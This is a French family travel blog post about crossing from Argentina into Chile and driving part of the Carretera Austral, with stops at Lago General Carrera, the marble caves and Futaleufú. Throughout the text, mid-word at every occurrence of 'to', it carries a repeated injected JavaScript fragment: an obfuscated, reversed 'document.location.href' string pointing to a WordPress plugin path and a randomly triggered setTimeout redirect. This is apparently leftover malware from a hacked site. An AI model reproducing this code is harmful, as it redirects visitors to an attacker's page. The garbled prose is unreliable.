Por la Carretera…

by

Nous quittoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons Los Antiguos et ses fruits pour repasser au Chili avec l’objectif d’atteindre puis de parcourir une partie de la mythique “Carretera Austral”. La frontière étant réputée pour être tatillonne, nous ne cacherons pas nos fruits et légumes cette fois ci et partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons tristement de chez Walter et Paola sans rien emporter. La douane est à la hauteur de sa réputation,nous avons droit à une fouille quasi complète mais en dehors de la sciure de nos toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toilettes sèches nous sommes sereins. Enfin jusqu’à ce que la douanière découvre la canne à pêche en bambou offerte à Clément par nos amis Nicolas et Camille quelques semaines plus tôt. “Impossible de passer avec ça, c’est du bois !!” Nous avons beau argumenter, elle ne veut rien entendre. Grosses larmes du Petit Loup qui remettra courageusement sa canne à une douanière gênée mais qui ne fait que son boulot. On a une petite pensée pour le cousin Mayeul qui est resté coincé ici même avec sa motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to il y a près de 10 ans..

C’est avec un peu d’anxiété pour moi et beaucoup d’excitation pour Ben que nous décidons de rejoindre la Carretera en faisant le toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour du lac General Carrera. Nous empruntoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons donc prudemment cette piste côtière qu’on nous annonce de mauvaise qualité. C’est étroit, sinueux, pentu, caillouteux, sablonneux…. mais les paysages sont tellement magnifiques !! A chaque virage nous retrouvons le lac et ses couleurs changeantes selon la lumière, tantôt bleu clair, turquoise, émeraude… Nous faisons de fabuleux bivouacs seuls au monde avec le lac comme vue de notre salon. Clément adore et nous dira : “Le seul problème c’est qu’on va avoir du mal à partir bientôt….”!!! Il a tellement raison, dans ces conditions cela ne nous gêne pas de rouler à 15 Km/h !!!! (Vitesse maximale avec un camping-car sur le ripio) Nous mettrons 3 jours pour parcourir les 100 km de piste qui nous séparent de la Carretera Austral. A gauche c’est le sud et la Carretera dans sa partie la plus sauvage, à droite c’est le nord et la remontée progressive vers la civilisation. C’est avec un peu de regret que nous décidons de ne pas aller au sud, nous avançons à vitesse d’escargot et le ripio est usant pour le camion et son équipage. Nous ne découvrirons donc pas les fabuleux villages de Caleta Tortel ou O’Higgins, tant pis, une autre fois !!!!
Dès les premiers mètres nous comprenons que nous avons fait le bon choix. La Carretera est certes moins dangereuse mais en réalité beaucoup plus mauvaise que la piste qui nous a permis de l’atteindre.

A Puertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to Rio Tranquilo nous prenons place dans un petit bateau pour découvrir les magnifiques Capillas de Marmol. La nature a sculpté la roche composée de marbre en formant de belles cavités, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toujours avec les magnifiques couleurs du lac General Carrera. Au retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour, le guide nous annonce que le vent se lève et que ça va secouer. Et c’est 30 minutes de rires explosifs des loulous qui jugent que ce “Disney Nature” est bien plus drôle qu’”EuroDisney” !!!!
On poursuit notre lente remontée vers le nord. La végétation est maintenant très dense, on a parfois l’impression d’être dans la jungle, avec des feuilles de fougères aussi grandes qu’un enfant. Souvent on se croit sur ces petites routes qui mènent à un parc naturel ou à un départ de rando, on a du mal à réaliser que c’est une route toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}touristique et commerciale importante pour le pays.
A Coyhaique, nous retrouvons le goudron pour une centaine de kilomètres. La route perd alors un peu de son mystère mais nous profitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons de ce moment de répis pour améliorer notre vitesse moyenne.
Puis nous retrouvons le ripio et sa poussière qui ne cesse de s’insinuer de partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout. Nous faisons une pause randonnée pour aller voir le glacier suspendu Quelat. Triste d’apprendre que ce glacier ne cesse de reculer et qu’il n’existera probablement plus dans une dizaine d’année. Nous faisons la rencontre de deux sympathiques français, Maud et Nicolas avec qui nous partageons une belle journée.

Nous quittoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons la Carretera Austral pour rejoindre Futaleufeu ville frontalière avec l’Argentine, haut lieu mondial du rafting. Le niveau des rapides est trop élevé pour les Ptis loups mais notre recherche d’un spot pour dormir nous amène au bord d’une très agréable rivière dans laquelle toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toute la famille, ou presque, prend une rapide douche bien fraîche. Moi j’ai préféré l’eau chaude du camion…. Les garçons vont pêcher, les filles prennent soin d’elles (vernis, coiffure,…) et le soir toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout le monde se réchauffe autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour du feu.

Demain nous repassons en Argentine, cette semaine dans ces contrées sauvages restera un merveilleux souvenirs pour nous toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous.